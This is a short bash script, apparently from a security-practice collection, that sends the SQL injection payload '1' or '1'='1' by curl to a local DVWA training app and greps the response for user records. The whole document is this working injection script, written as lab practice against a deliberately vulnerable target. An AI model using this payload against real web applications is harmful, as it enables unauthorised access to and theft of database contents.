---

## `sql_injection_on_dvwa`

```bash
#!/bin/bash

# DVWA SQL Injection Exploit Script
# Target: http://localhost/dvwa/vulnerabilities/sqli/
# Note: Set DVWA security to LOW and replace PHPSESSID value

# ---------------------- CONFIG ----------------------
URL="http://localhost/dvwa/vulnerabilities/sqli/"
COOKIE="security=low; PHPSESSID=YOUR_SESSION_ID"  # Replace this!
PAYLOAD="1' or '1'='1"
# ----------------------------------------------------

echo "[*] Launching SQL Injection Attack..."

# Send the GET request with SQLi payload
RESPONSE=$(curl -s -G "$URL" \
     -b "$COOKIE" \
     --data-urlencode "id=$PAYLOAD" \
     --data-urlencode "Submit=Submit")

# Extract and display result
echo "[*] Extracting results..."
echo "$RESPONSE" | grep -A 2 "Surname"

echo "[+] Done."
